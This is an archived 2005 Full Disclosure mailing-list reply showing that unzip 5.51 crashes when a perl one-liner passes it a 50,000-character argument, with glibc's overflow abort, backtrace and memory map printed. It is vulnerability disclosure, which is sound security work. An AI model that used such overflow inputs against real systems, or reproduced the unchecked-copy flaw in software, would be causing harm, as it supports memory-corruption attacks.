Full Disclosure mailing list archives
RE: Unzip *ALL* verisons ;))
From: "Bob Dehnhardt" <bob.dehnhardt () trinet com>
Date: Mon, 19 Dec 2005 09:11:05 -0800
[bobd@ ~]$ unzip -v|head -1 UnZip 5.51 of 22 May 2004, by Info-ZIP. Maintained by C. Spieler. Send [bobd@ ~]$ uname -a Linux 2.6.14-1.1644_FC4 #1 Sun Nov 27 03:25:11 EST 2005 i686 i686 i386 GNU/Linux [bobd@ ~]$ unzip `perl -e 'print "A" x 50000'` *** buffer overflow detected ***: unzip terminated ======= Backtrace: ========= /lib/libc.so.6(__chk_fail+0x41)[0xac5c45] /lib/libc.so.6(__strcpy_chk+0x3f)[0xac52d7] unzip[0x805c1da] unzip[0x8056734] unzip[0x804a75a] /lib/libc.so.6(__libc_start_main+0xdf)[0x9fcd5f] unzip[0x80491b1] ======= Memory map: ======== 0027e000-00287000 r-xp 00000000 16:06 617610 /lib/libgcc_s-4.0.2-20051126.so.1 00287000-00288000 rwxp 00009000 16:06 617610 /lib/libgcc_s-4.0.2-20051126.so.1 00971000-00972000 r-xp 00971000 00:00 0 [vdso] 009ca000-009e4000 r-xp 00000000 16:06 618035 /lib/ld-2.3.5.so 009e4000-009e5000 r-xp 00019000 16:06 618035 /lib/ld-2.3.5.so 009e5000-009e6000 rwxp 0001a000 16:06 618035 /lib/ld-2.3.5.so 009e8000-00b0b000 r-xp 00000000 16:06 618037 /lib/libc-2.3.5.so 00b0b000-00b0d000 r-xp 00123000 16:06 618037 /lib/libc-2.3.5.so 00b0d000-00b0f000 rwxp 00125000 16:06 618037 /lib/libc-2.3.5.so 00b0f000-00b11000 rwxp 00b0f000 00:00 0 08047000-08064000 r-xp 00000000 16:06 853429 /usr/bin/unzip 08064000-08065000 rw-p 0001c000 16:06 853429 /usr/bin/unzip 08065000-08077000 rw-p 08065000 00:00 0 090b1000-090d4000 rw-p 090b1000 00:00 0 [heap] b7fab000-b7fac000 rw-p b7fab000 00:00 0 b7fc6000-b7fc7000 rw-p b7fc6000 00:00 0 bffa5000-bffc7000 rw-p bffa5000 00:00 0 [stack] Aborted - Bob
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Unzip *ALL* verisons ;)), (continued)
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) Joachim Schipper (Dec 19)
- Re: Unzip *ALL* verisons ;)) deepquest (Dec 19)
- Re: Unzip *ALL* verisons ;)) KF (lists) (Dec 19)
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) KF (lists) (Dec 19)
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) GroundZero Security (Dec 19)